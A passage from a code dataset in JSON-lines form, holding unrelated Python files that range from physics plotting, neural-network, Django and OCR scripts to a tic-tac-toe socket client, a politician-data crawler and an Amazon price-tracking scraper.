'')\n\nc1.cd()\n\nh1 = TH2F('h1', '', 50, 20, 220, 30, 0.5, 1.5)\nh2 = TH2F('h2', '', 50, 20, 220, 30, 0.5, 1.5)\n\ntree.Project('h1', 'Jet_corr:Jet_pt', cut)\ntree_ttbar.Project('h2', \"(Jet_pt/Jet_rawPt):Jet_pt\", data_cut)\n\n\n# normalize\n#h1.Scale(1 / h1.Integral())\n#h2.Scale(1 / h2.Integral())\n\nh1.SetLineWidth(2)\nh1.SetStats(0)\n\n # get the profiles\nprof_mc = h1.ProfileX()\nprof_mc.SetLineColor(kRed)\nprof_data = h2.ProfileX()\nprof_data.SetLineColor(kBlack)\n\nprof_mc.SetMinimum(0.95)\nprof_mc.SetMaximum(1.15)\n\nprof_mc.SetStats(0)\nprof_mc.Draw()\nprof_data.Draw('same')\nprof_mc.GetXaxis().SetTitle('Jet pT')\nprof_mc.GetYaxis().SetTitle('Jet Correction')\n\n#h2.SetLineColor(kRed)\n#h2.SetLineWidth(2)\n#h2.SetFillStyle(3335)\n#h2.SetFillColor(kRed)\n\n#s1.Add(h2)\n#s1.Add(h1)\n#s1.Draw('nostack')\n#s1.GetXaxis().SetTitle('Generator Jet p_{T} [GeV]')\n\n\nleg = TLegend(0.62,0.7,0.9,0.9)\nleg.SetFillStyle(0)\nleg.SetBorderSize(0)\nleg.AddEntry(prof_mc, 'ZH125', 'l')\nleg.AddEntry(prof_data, 'Data', 'l')\nleg.Draw('same')\n\nc1.SaveAs('plots/jet_corr.pdf')\n\n\nraw_input('press return to continue')\n\n# Delete objects.\nc1.IsA().Destructor(c1)\ns1.IsA().Destructor(s1)\nh1.IsA().Destructor(h1)\nh2.IsA().Destructor(h2)\n\n\n'''\n\n# dijet mAss\nc1 = TCanvas('c1')\ns1 = THStack('s1', '')\n\nc1.cd()\n\ntree.Draw('HCSV_mass >> h3(50,20,220)')\ntree_ttbar.Draw('HCSV_mass >> h4(50,20,220)')\n\n# normalize\nh3.Scale(1 / h3.Integral())\nh4.Scale(1 / h4.Integral())\n\nh3.SetLineWidth(2)\nh3.SetStats(0)\n\nh4.SetLineColor(kRed)\nh4.SetLineWidth(2)\nh4.SetFillStyle(3335)\nh4.SetFillColor(kRed)\n\ns1.Add(h4)\ns1.Add(h3)\ns1.Draw('nostack')\ns1.GetXaxis().SetTitle('M(jj) [GeV]')\n\n\nleg = TLegend(0.62,0.6,0.9,0.9)\nleg.SetFillStyle(0)\nleg.SetBorderSize(0)\nleg.AddEntry(h3, 'ZH125', 'l')\nleg.AddEntry(h4, 'ttbar', 'l')\nleg.Draw('same')\n\nc1.SaveAs('plots/mjj.pdf')\n\n\nraw_input('press return to continue')\n\n# Delete objects.\nc1.IsA().Destructor(c1)\ns1.IsA().Destructor(s1)\nh3.IsA().Destructor(h3)\nh4.IsA().Destructor(h4)\n\n\n'''\n\n\nraw_input('press return to continue')\n \n \n","sub_path":"myMacros/simple_plotters/simple_zll_HistMaker.py","file_name":"simple_zll_HistMaker.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} 
+{"seq_id":"512039479","text":"import architecture\nimport tensorflow as tf\nimport Architectures.Layers.inception_resnet_a as ira\nimport Architectures.Layers.inception_resnet_b as irb\nimport Architectures.Layers.inception_resnet_c as irc\nimport Architectures.Layers.guidedfilter_color_trainable_test as gct\n\nclass DeepdiveSibigrapiGuided5(architecture.Architecture):\n def __init__(self):\n parameters_list = ['input_size', 'summary_writing_period',\n \"validation_period\", \"model_saving_period\"]\n\n self.config_dict = self.open_config(parameters_list)\n self.input_size = self.config_dict[\"input_size\"][0:2]\n\n def prediction(self, sample, training=False):\n \" Coarse-scale Network\"\n normalizer_params = {'is_training':training, 'center':True,\n 'updates_collections':None, 'scale':True}\n conv1 = tf.contrib.layers.conv2d(inputs=sample, num_outputs=16, kernel_size=[3, 3],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.relu)\n \n module_a = ira.inception_resnet_a(conv1, normalizer_params)\n module_b = irb.inception_resnet_b(module_a, normalizer_params)\n module_c = irc.inception_resnet_c(module_b, normalizer_params)\n\n\n conv2 = tf.contrib.layers.conv2d(inputs=module_c, num_outputs=3, kernel_size=[3, 3],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=tf.nn.tanh)\n\n guided_list = []\n for i in range(3):\n if i == 0:\n reuse = None\n else:\n reuse = True\n \n with tf.variable_scope(\"guided\",reuse=reuse):\n conv2_layer =tf.expand_dims(conv2[:,:,:,i], -1) \n guided_layer = gct.guidedfilter_color_treinable(sample, conv2_layer, r=20, eps=10**-3)\n guided_list.append(guided_layer)\n\n guided_list.append(sample)\n guided_plus_skip = tf.concat(guided_list, 3)\n conv3 = tf.contrib.layers.conv2d(inputs=guided_plus_skip, num_outputs=3, kernel_size=[3, 3],\n stride=[1, 1], padding='SAME',\n normalizer_fn=tf.contrib.layers.batch_norm,\n normalizer_params=normalizer_params,\n activation_fn=None)\n \n const_1 = tf.constant(1, dtype=tf.float32)\n brelu2 = tf.minimum(const_1, tf.nn.relu(conv3))\n tf.summary.image(\"architecture_output\", brelu2)\n return brelu2\n\n\n\n def get_validation_period(self):\n return self.config_dict[\"validation_period\"]\n\n def get_model_saving_period(self):\n return self.config_dict[\"model_saving_period\"]\n\n def get_summary_writing_period(self):\n return self.config_dict[\"summary_writing_period\"]\n","sub_path":"Architectures/ProjectDeepdive/sibigrapi/deepdive_sibigrapi_guided5.py","file_name":"deepdive_sibigrapi_guided5.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"76287888","text":"from django.core.urlresolvers import reverse\nfrom rest_framework import serializers\n\nfrom .models import Province, Region\n\n\nclass ProvinceSerializer(serializers.ModelSerializer):\n regions = serializers.SerializerMethodField(method_name='get_regions_url')\n\n class Meta:\n model = Province\n\n fields = (\n 'name',\n 'name_en',\n 'name_ru',\n 'name_uz',\n 'regions',\n 'code',\n )\n\n def get_regions_url(self, obj):\n return self.context['request'].build_absolute_uri(\n reverse('address-api:province_regions', kwargs={'province': obj.code}))\n\n\nclass RegionSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Region\n\n fields = (\n 'name',\n 'name_en',\n 'name_ru',\n 'name_uz',\n 
'code',\n )\n\n","sub_path":"uzbplaces/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"134981686","text":"import random\nimport time\nimport socket\n\nclass Player:\n\n def __init__(self, name):\n self.name = name\n\n def get_input(self, board):\n x = int(input(\"Enter x:\"))\n y = int(input(\"Enter y:\"))\n return x, y\n\n\nclass Board:\n def __init__(self):\n self.matrix = [[0, 0, 0],\n [0, 0, 0],\n [0, 0, 0]]\n\n def set(self, player_key, row, column):\n if row < 0 or row > 2 or column < 0 or column > 2:\n return False\n if self.matrix[row][column] != 0:\n return False\n self.matrix[row][column] = player_key\n return True\n\n def is_full(self):\n for i in range(0,3):\n for j in range(0,3):\n if self.matrix[i][j] == 0:\n return False\n return True\n\n def is_game_over(self):\n for i in range(0,3):\n ok = True\n for j in range(0,3):\n if self.matrix[i][j] != self.matrix[i][0]:\n ok = False\n if ok == True and self.matrix[i][0] != 0:\n return self.matrix[i][0]\n\n for j in range(0,3):\n ok = True\n for i in range(0,3):\n if self.matrix[i][j] != self.matrix[0][j]:\n ok = False\n if ok == True and self.matrix[0][j] != 0:\n return self.matrix[0][j]\n\n if self.matrix[0][0] == self.matrix[1][1] and self.matrix[1][1] == self.matrix[2][2] and self.matrix[0][0] != 0:\n return self.matrix[0][0]\n\n if self.matrix[0][2] == self.matrix[1][1] and self.matrix[2][0] == self.matrix[1][1] and self.matrix[1][1] != 0:\n return self.matrix[1][1]\n\n if self.is_full() == True:\n return 3\n else:\n return 0\n\n def draw(self):\n print(\"{} {} {}\\n{} {} {}\\n{} {} {}\".format(*[self.matrix[i][j] for i in range(0,3) for j in range(0,3)]))\n\nclass Game:\n\n def __init__(self):\n self.player1 = Player(\"PlayerOne\")\n self.player2 = Player(\"PlayerTwo\")\n self.board = Board()\n self.game_loop()\n\n def game_loop(self):\n pindex = 1\n ownIndex = 0\n\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect(('127.0.0.1', 65432))\n\n ownIndex = int(s.recv(1024))\n print(\"You are player %d\" % ownIndex)\n\n data = (0,0)\n\n while True:\n\n self.board.draw()\n\n print(\"Player %d turn:\" % pindex)\n coord = (-1, -1)\n if pindex != ownIndex:\n x = s.recv(1024)\n y = s.recv(1024)\n coord = (int(x), int(y))\n if not coord:\n break\n else:\n if ownIndex == 1:\n coord = self.player1.get_input(self.board)\n else:\n coord = self.player2.get_input(self.board)\n s.send(str(coord[0]).encode(\"utf-8\"))\n s.send(str(coord[1]).encode(\"utf-8\"))\n\n time.sleep(1)\n if coord[0] > 2 or coord [0] < 0 or coord[1] > 2 or coord [1] < 0:\n print(\"Incorrect coordinates\")\n s.send(str(pindex).encode('utf-8'))\n continue\n\n if not self.board.set(pindex, *coord):\n print(\"Invalid choice\")\n s.send(str(pindex).encode('utf-8'))\n continue\n\n state = self.board.is_game_over()\n\n if state == 1 or state == 2:\n print(\"Player %d wins:\" % pindex)\n self.board.draw()\n break\n elif state == 3:\n print(\"The game ended in draw\")\n self.board.draw()\n break\n\n pindex = pindex % 2 + 1\n s.send(str(pindex).encode('utf-8'))\n\ngame = Game()","sub_path":"labs/firststef/05_week/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"106686915","text":"def cuberoot2(x0):\n x = x0\n i = 0\n while True:\n nextIt = (1/3)*(2*x+2/(x**2))\n if (abs(nextIt - x) <= 
10**-7):\n            break\n        else:\n            i += 1\n            x = nextIt\n    print(\"The sequence starting at\", x0, \"converges to\", x,\"in\", i, \"iterations.\")\n\ncuberoot2(20)\n\ndef nesty(x):\n    f = (x - 1) ** 5\n    g = x ** 5 - 5 * x ** 4 + 10 * x ** 3 - 10 * x ** 2 + 5 * x -1\n    h = x * (5 - x * (10 - x * (10 - x * (5 - x)))) - 1\n    print(\"x =\", x, \", f(x) =\", f, \", g(x) =\", g, \", h(x) =\", h)\n\nfor i in range(1,8):\n    nesty(1 + 10 ** -i)\n\n#the answer *should* be (10^-n)^5 = 10 ^ -5n. With n ranging from 1 to 7, that goes as low as 10 ^ -35! This means that we want to minimize our loss of significance or face massive relative error\n#f minimized the number of operations (in particular subtraction) to the answer, thereby minimizing loss of significance and the relative error\n#therefore f output the best results\n#on the other hand, g and h had more subtraction, resulting in greater loss of significance, worse relative error, and worse results","sub_path":"Numerical Methods, Analysis, and Computation/Numerical Methods and Analysis/Roots-And-Error.py","file_name":"Roots-And-Error.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"641030794","text":"\r\nfrom tensorflow.keras.models import load_model\r\nfrom imutils.contours import sort_contours\r\nimport numpy as np\r\nimport imutils\r\nimport cv2\r\n\r\n\r\nprint(\"Loading model:\")\r\nmodel = load_model('model2.h5')\r\n\r\ntestImage = cv2.imread('test7.jpg')\r\ngray = cv2.cvtColor(testImage, cv2.COLOR_BGR2GRAY)\r\nblurred = cv2.GaussianBlur(gray, (5, 5), 0)\r\n\r\nedged = cv2.Canny(blurred, 30, 150)\r\nconts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL,\r\n\tcv2.CHAIN_APPROX_SIMPLE)\r\nconts = imutils.grab_contours(conts)\r\nconts = sort_contours(conts, method=\"left-to-right\")[0]\r\n\r\nLetters = []\r\n\r\nfor c in conts:\r\n\t(x, y, Width, Height) = cv2.boundingRect(c)\r\n\tif (Width >= 5 and Width <= 150) and (Height >= 15 and Height <= 120):\r\n\t\troi = gray[y:y + Height, x:x + Width]\r\n\t\tthresh = cv2.threshold(roi, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\r\n\t\t(tH, tW) = thresh.shape\r\n\r\n\t\tif tW > tH:\r\n\t\t\tthresh = imutils.resize(thresh, width=28)\r\n\t\telse:\r\n\t\t\tthresh = imutils.resize(thresh, height=28)\r\n\r\n\t\t(tH, tW) = thresh.shape\r\n\t\tdX = int(max(0, 28 - tW) / 2.0)\r\n\t\tdY = int(max(0, 28 - tH) / 2.0)\r\n\r\n\t\tpadded = cv2.copyMakeBorder(thresh, top=dY, bottom=dY, left=dX, right=dX, borderType=cv2.BORDER_CONSTANT, value=(0, 0, 0))\r\n\t\tpadded = cv2.resize(padded, (28, 28))\r\n\r\n\t\tpadded = padded.astype(\"float32\") / 255.0\r\n\t\tpadded = np.expand_dims(padded, axis=-1)\r\n\r\n\t\tLetters.append((padded, (x, y, Width, Height)))\r\n\t\t\r\n\r\n\r\nboxes = [b[1] for b in Letters]\r\nLetters = np.array([c[0] for c in Letters], dtype=\"float32\")\r\n\r\npreds = model.predict(Letters)\r\n\r\nlabelNames = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\nlabelNames = [l for l in labelNames]\r\n\r\n\r\nfor (pred, (x, y, w, h)) in zip(preds, boxes):\r\n\ti = np.argmax(pred)\r\n\tprob = pred[i]\r\n\tlabel = labelNames[i]\r\n\tprint(\"Letter {} - {:.2f}% chance of being accurate\".format(label, prob * 100))\r\n\tcv2.rectangle(testImage, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n\tcv2.putText(testImage, label, (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 1.2, (0, 255, 0), 2)\r\n\t\t\r\n\tcv2.imshow(\"Image\", 
testImage)\r\n\tcv2.waitKey(0)","sub_path":"OCR3.py","file_name":"OCR3.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"17227575","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport redis\n\n__author__ = 'dz0ny'\n__email__ = 'dz0ny@ubuntu.si'\n__version__ = '0.0.3'\n\nclass Enviroment:\n # Singleton\n\n database = redis.StrictRedis.from_url(\n os.getenv('REDISTOGO_URL', 'redis://localhost:6379')\n )","sub_path":"yodl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"35851452","text":"import numpy as np\r\nimport csv\r\nimport pymysql\r\n\r\ndata_file = open(\"data.txt\")\r\ncount= 0\r\ndate=[]\r\ncountries=[]\r\nfor aline in data_file.readlines(): #read each line of text file\r\n aline.strip(\"\\n\")\r\n count=count+1\r\n if count>11:\r\n values=aline.split(',') #seperate values by comma\r\n countries.append(values[1:]) #store in countries array\r\n date.append(values[0])\r\n#print(date[0])\r\ndate= np.array(date)\r\ncountry=np.array(countries)\r\ncountry[:,-1] = [w.replace('\\n', '') for w in country[:,-1]]\r\ndata=np.column_stack((date,country))\r\ndata1=[[char or 0 for char in i]for i in data]\r\n\r\nconnection = pymysql.connect(host='localhost',\r\n user='root',\r\n cursorclass=pymysql.cursors.DictCursor)\r\ntry:\r\n with connection.cursor() as cursor:\r\n # Create a new record\r\n \r\n cursor.execute(\"CREATE DATABASE WORLDFLUDATABASE\")\r\n\r\n # connection is not autocommit by default. So you must commit to save\r\n # your changes.\r\n connection.commit()\r\n\r\n with connection.cursor() as cursor:\r\n # Create table coloumn\r\n cursor.execute(\"CREATE TABLE WORLDFLUDATABASE.FLUDATA(Date DATE,Argentina INT,Australia INT,Austria INT,Belgium INT,Bolivia INT,Brazil INT,Bulgaria INT,Canada INT,Chile INT,France INT,Germany INT,Hungary INT,Japan INT,Mexico INT,Netherlands INT,NewZealand INT,Norway INT,Paraguay INT,Peru INT,Poland INT,Romania INT,Russia INT,SouthAfrica INT,Spain INT,Sweden INT,Switzerland INT,Ukraine INT,UnitedStates INT,Uruguay INT)\")\r\n connection.commit()\r\n\r\n with connection.cursor() as cursor:\r\n for i in range(1,np.shape(data1)[0]):\r\n cursor.execute(\"INSERT INTO WORLDFLUDATABASE.FLUDATA(Date,Argentina,Australia,Austria,Belgium,Bolivia,Brazil,Bulgaria,Canada,Chile,France,Germany,Hungary,Japan,Mexico,Netherlands,NewZealand,Norway,Paraguay,Peru,Poland,Romania,Russia,SouthAfrica,Spain,Sweden,Switzerland,Ukraine,UnitedStates,Uruguay) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\",[char for char in data1[i]])\r\n connection.commit()\r\n#### Q1 ####\r\n with connection.cursor() as cursor:\r\n cursor.execute(\"SELECT * FROM WORLDFLUDATABASE.FLUDATA WHERE Date BETWEEN '2003-08-01' AND '2003-08-31'\")\r\n connection.commit()\r\n\r\n#### Q2 ####\r\n with connection.cursor() as cursor:\r\n cursor.execute(\"SELECT DISTINCT YEAR(Date) FROM WORLDFLUDATABASE.FLUDATA WHERE UnitedStates>1000\")\r\n connection.commit()\r\n\r\n#### Q3 ####\r\n with connection.cursor() as cursor:\r\n cursor.execute(\"SELECT DISTINCT YEAR(Date) FROM WORLDFLUDATABASE.FLUDATA WHERE UnitedStates > (Argentina 
+Australia+Austria+Belgium+Bolivia+Brazil+Bulgaria+Canada+Chile+France+Germany+Hungary+Japan+Mexico+Netherlands+NewZealand+Norway+Paraguay+Peru+Poland+Romania+Russia+SouthAfrica+Spain+Sweden+Switzerland+Ukraine+UnitedStates+Uruguay)/29\")\r\n connection.commit()\r\n\r\n#### Q4 ####\r\n with connection.cursor() as cursor:\r\n cursor.execute(\"SELECT * FROM WORLDFLUDATABASE.FLUDATA PROCEDURE ANALYSE()\")\r\n connection.commit()\r\n\r\n#### Q5 ####\r\n with connection.cursor() as cursor:\r\n cursor.execute(\"SELECT * FROM WORLDFLUDATABASE.FLUDATA PROCEDURE ANALYSE()\")\r\n\r\nfinally:\r\n connection.close()\r\n#data2=pd.dataframe(data1)\r\ndata_file.close()\r\n\r\n","sub_path":"IE590 HW9 SQL codes for flu data/Flu - Copy.py","file_name":"Flu - Copy.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"27306033","text":"import datetime\nimport decimal\nimport json\nimport logging\n\nfrom django.db.models.fields.files import ImageFieldFile\nfrom django.http import HttpResponse\n\n# Encode our different classes into json\nfrom django.conf import settings\n\nlogger = logging.getLogger(__name__)\n\n\nclass DefaultJSONEncoder(json.JSONEncoder):\n\tdef default(self, o):\n\n\t\tif isinstance(o, datetime.time):\n\t\t\treturn o.strftime(\"%I:%M %p\")\n\t\tif isinstance(o, datetime.datetime):\n\t\t\treturn o.strftime(\"%Y-%m-%dT%H:%M:%S.%s%z\")\n\t\tif isinstance(o, datetime.date):\n\t\t\treturn o.strftime(\"%Y-%m-%d\")\n\t\tif isinstance(o, decimal.Decimal):\n\t\t\t# http://stackoverflow.com/a/1960649/1163156\n\t\t\t# wanted a simple yield str(o) in the next line,\n\t\t\t# but that would mean a yield on the line with super(...),\n\t\t\t# which wouldn't work (see my comment below), so...\n\t\t\treturn float(o)\n\t\tif isinstance(o, ImageFieldFile):\n\t\t\tif o:\n\t\t\t\treturn settings.MEDIA_URL + '/' + o.path\n\t\t\telse:\n\t\t\t\treturn None\n\t\tif isinstance(o, float):\n\t\t\treturn (str(o) for o in [o])\n\n\t\treturn str(o)\n\n\ndef composeJsonResponse(code, message, data):\n\treturnStatus = {'code': code, 'message': message}\n\treturnMsg = {'status': returnStatus, 'response': data}\n\n\treturnDataType = 'application/json'\n\ttry:\n\t\treturnDataString = json.dumps(returnMsg, cls=DefaultJSONEncoder)\n\t\tx = type(returnDataString)\n\texcept Exception as exc:\n\t\tlogger.error(exc)\n\n\t\treturnStatus = {'code': 500, 'message': 'Can not encode return data.'}\n\t\treturnMsg = {'status': returnStatus, 'response': ''}\n\t\treturnDataString = json.dumps(returnMsg, cls=DefaultJSONEncoder)\n\n\treturn HttpResponse(returnDataString, content_type=returnDataType)\n","sub_path":"api_helpers.py","file_name":"api_helpers.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"648905282","text":"from opensanctions.util import EntityEmitter\n\n\ndef index(context, data):\n with context.http.rehash(data) as res:\n for country in res.json:\n for legislature in country.get('legislatures', []):\n context.emit(data={\n \"country\": country,\n \"legislature\": legislature,\n \"url\": legislature.get('popolo_url'),\n })\n\n\ndef parse(context, data):\n emitter = EntityEmitter(context)\n country = data.get('country', {}).get('code')\n with context.http.rehash(data) as res:\n persons = {}\n for person in res.json.get('persons', []):\n ep_id, ftm_id = parse_person(emitter, person, country)\n persons[ep_id] = ftm_id\n\n organizations = 
{}\n for organization in res.json.get('organizations', []):\n ep_id, ftm_id = parse_organization(emitter, organization, country)\n organizations[ep_id] = ftm_id\n\n for membership in res.json.get('memberships', []):\n parse_membership(emitter, membership, persons, organizations)\n emitter.finalize()\n\n\ndef parse_person(emitter, data, country):\n person_id = data.pop('id', None)\n person = emitter.make('Person')\n person.make_id(person_id)\n person.add('name', data.pop('name', None))\n person.add('alias', data.pop('sort_name', None))\n person.add('gender', data.pop('gender', None))\n person.add('title', data.pop('honorific_prefix', None))\n person.add('title', data.pop('honorific_suffix', None))\n person.add('firstName', data.pop('given_name', None))\n person.add('lastName', data.pop('family_name', None))\n person.add('fatherName', data.pop('patronymic_name', None))\n person.add('birthDate', data.pop('birth_date', None))\n person.add('deathDate', data.pop('death_date', None))\n person.add('email', data.pop('email', None))\n person.add('summary', data.pop('summary', None))\n person.add('keywords', ['PEP', 'PARL'])\n\n for other_name in data.pop('other_names', []):\n person.add('alias', other_name.get('name'))\n\n for identifier in data.pop('identifiers', []):\n if 'wikidata' == identifier.get('scheme'):\n person.add('wikidataId', identifier.get('identifier'))\n\n for link in data.pop('links', []):\n if 'Wikipedia' in link.get('note'):\n person.add('wikipediaUrl', link.get('url'))\n\n for contact_detail in data.pop('contact_details', []):\n if 'email' == contact_detail.get('type'):\n person.add('email', contact_detail.get('value'))\n if 'phone' == contact_detail.get('type'):\n person.add('phone', contact_detail.get('value'))\n\n # data.pop('image', None)\n emitter.emit(person)\n return person_id, person.id\n\n\ndef parse_organization(emitter, data, country):\n org_id = data.get('id')\n if data.get('name') == 'unknown':\n return org_id, None\n\n organization = emitter.make('Organization')\n organization.make_id(org_id)\n organization.add('name', data.get('name'))\n organization.add('summary', data.get('type'))\n organization.add('country', country)\n\n for identifier in data.get('identifiers', []):\n if 'wikidata' == identifier.get('scheme'):\n organization.add('wikidataId', identifier.get('identifier'))\n\n emitter.emit(organization)\n return org_id, organization.id\n\n\ndef parse_membership(emitter, data, persons, organizations):\n person_id = persons.get(data.get('person_id'))\n organization_id = organizations.get(data.get('organization_id'))\n on_behalf_of_id = organizations.get(data.get('on_behalf_of_id'))\n\n if person_id and organization_id:\n membership = emitter.make('Membership')\n membership.make_id(person_id, organization_id)\n membership.add('member', person_id)\n membership.add('organization', organization_id)\n membership.add('role', data.get('role'))\n\n for source in data.get('sources', []):\n membership.add('sourceUrl', source.get('url'))\n\n emitter.emit(membership)\n\n if person_id and on_behalf_of_id:\n membership = emitter.make('Membership')\n membership.make_id(person_id, on_behalf_of_id)\n membership.add('member', person_id)\n membership.add('organization', on_behalf_of_id)\n\n for source in data.get('sources', []):\n membership.add('sourceUrl', source.get('url'))\n\n 
emitter.emit(membership)\n","sub_path":"opensanctions/crawlers/everypolitician.py","file_name":"everypolitician.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"494033478","text":"\"\"\"\nWOFpy\n-------\n\nWOFpy is a python library for serving CUAHSI's WaterOneflow web services\n\nCUAHSI is the Consortium of Universities for the\nAdvancement of Hydrologic Science, Inc.\n\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function)\n\nimport codecs\nimport os\nimport re\n\nfrom setuptools import find_packages, setup\n\nimport versioneer\n\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n\ndef read(*parts):\n return codecs.open(os.path.join(here, *parts), 'r').read()\n\n\n# Dependencies.\nwith open('requirements.txt') as f:\n requirements = f.readlines()\ninstall_requires = [t.strip() for t in requirements]\n\nsetup(\n name='WOFpy',\n version=versioneer.get_version(),\n license='BSD',\n author='James Seppi',\n author_email='james.seppi@gmail.com',\n # note: maintainer gets listed as author in PKG-INFO, so leaving\n # this commented out for now\n maintainer='Emilio Mayorga',\n maintainer_email='emiliom@uw.edu',\n description='a python library for serving WaterOneFlow web services',\n long_description=__doc__,\n keywords='cuahsi his wofpy water waterml cuahsi wateroneflow odm2',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n platforms='any',\n install_requires=install_requires,\n extras_require={\n 'odm1': ['sqlalchemy', 'pyodbc'],\n 'odm2': ['sqlalchemy', 'odm2api'],\n 'sqlite': ['sqlalchemy'],\n 'server': ['uwsgi'],\n },\n tests_require=['suds-jurko', 'requests'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ],\n entry_points=dict(console_scripts=[\n 'wofpy_config = wof.wofpy_config:main'\n ]\n ),\n cmdclass=versioneer.get_cmdclass(),\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"203495239","text":"import utm\nimport math\n\n\nclass MapCoords(object):\n\n def __init__(self, lat, lon):\n self.lat =lat\n self.lon =lon\n a = utm.from_latlon(lat, lon)\n self.northing = a[1]\n self.easting = a[0]\n self.zone_number = a[2]\n self.zone_letter = a[3]\n\n def _get_rel_point(self, easting, northing):\n a = utm.to_latlon(self.easting + easting, self.northing + northing, self.zone_number, self.zone_letter)\n return MapCoords(a[0], a[1])\n\n def __sub__(self, other):\n dnorth = self.northing - other.northing\n deast = self.easting - other.easting\n dist = math.hypot(deast, dnorth)\n orient = math.atan2(dnorth, deast) * 180/math.pi\n return dist, orient\n\n\n def __mod__(self, other):\n dnorth = ((self.northing + other.northing)/2)\n deast = ((self.easting + other.easting)/2)\n a = utm.to_latlon(deast, dnorth, self.zone_number, self.zone_letter)\n return MapCoords(a[0], a[1]) \n \n# print dnorth, deast\n# midpoint = self._get_rel_point(deast, dnorth)\n# return midpoint\n\n\n def __repr__(self):\n a = 
dir(self)\n b = []\n s = ''\n for i in a:\n if not i.startswith('_'):\n b.append(str(i))\n for i in b:\n s = s + str(i) + ': ' + str(self.__getattribute__(i)) + '\\n'\n return s\n\n\ndef coord_from_satnav_fix(msg):\n a = MapCoords(msg.latitude, msg.longitude)\n return a\n","sub_path":"kriging_exploration/src/kriging_exploration/map_coords.py","file_name":"map_coords.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"369751392","text":"from bs4 import BeautifulSoup\nfrom requests_html import HTMLSession\nimport os\nimport time\nimport smtplib , ssl\nimport requests\n\nclass Scraper:\n\n #Initializes the scraper shopping bot\n def __init__(self,url,budget,u_email):\n\n #Attributes about product\n self.url = url\n self.budget = budget\n\n #Setting user email\n self.u_email = u_email\n\n #Attributes about scraping\n self.session = HTMLSession()\n # specifying user agent, You can use other user agents\n # available on the internet\n self.HEADERS = ({'User-Agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36'})\n # Making the HTTP Request\n print(requests.get(self.url, headers=self.HEADERS))\n self.webpage = requests.get(self.url, headers=self.HEADERS)\n self.parser = 'lxml'\n self.soup = BeautifulSoup(self.webpage.content,self.parser)\n\n #Prints the object\n def __str__(self):\n return self.soup.prettify()\n\n #Stores the title of the product\n def get_title(self):\n title = self.soup.find(\"span\",\n attrs={\"id\": 'productTitle'})\n # Inner NavigableString Object\n title_value = title.string\n\n # Title as a string value\n self.product_title = title_value.strip().replace(',', '')\n return self.product_title\n\n #Stores the price of the product after filtering the string and converting it to an integer\n def get_price(self):\n try:\n price = self.soup.find(\n \"span\", attrs={'id': 'priceblock_ourprice'}).string.strip().replace(',', '')\n # we are omitting unnecessary spaces\n # and commas form our string\n except AttributeError:\n try:\n price = self.soup.find(id='priceblock_saleprice').get_text().replace('$', '').replace(',', '').strip()\n except:\n try:\n price = self.soup.find(id='newBuyBoxPrice').get_text().replace('$', '').replace(',', '').strip()\n except:\n price = 'NA'\n print(price)\n self.product_price = price.strip().replace(',', '')\n if self.product_price[0] == '$':\n self.product_price = self.product_price[1:]\n return self.product_price\n\n #Prints product title\n def print_title(self):\n print(self.product_title)\n return\n\n #Prints product price\n def print_price(self):\n print(self.product_price)\n return\n\n #Checks if the price of the product is below the budget\n def is_below_budget(self):\n if float(self.product_price) 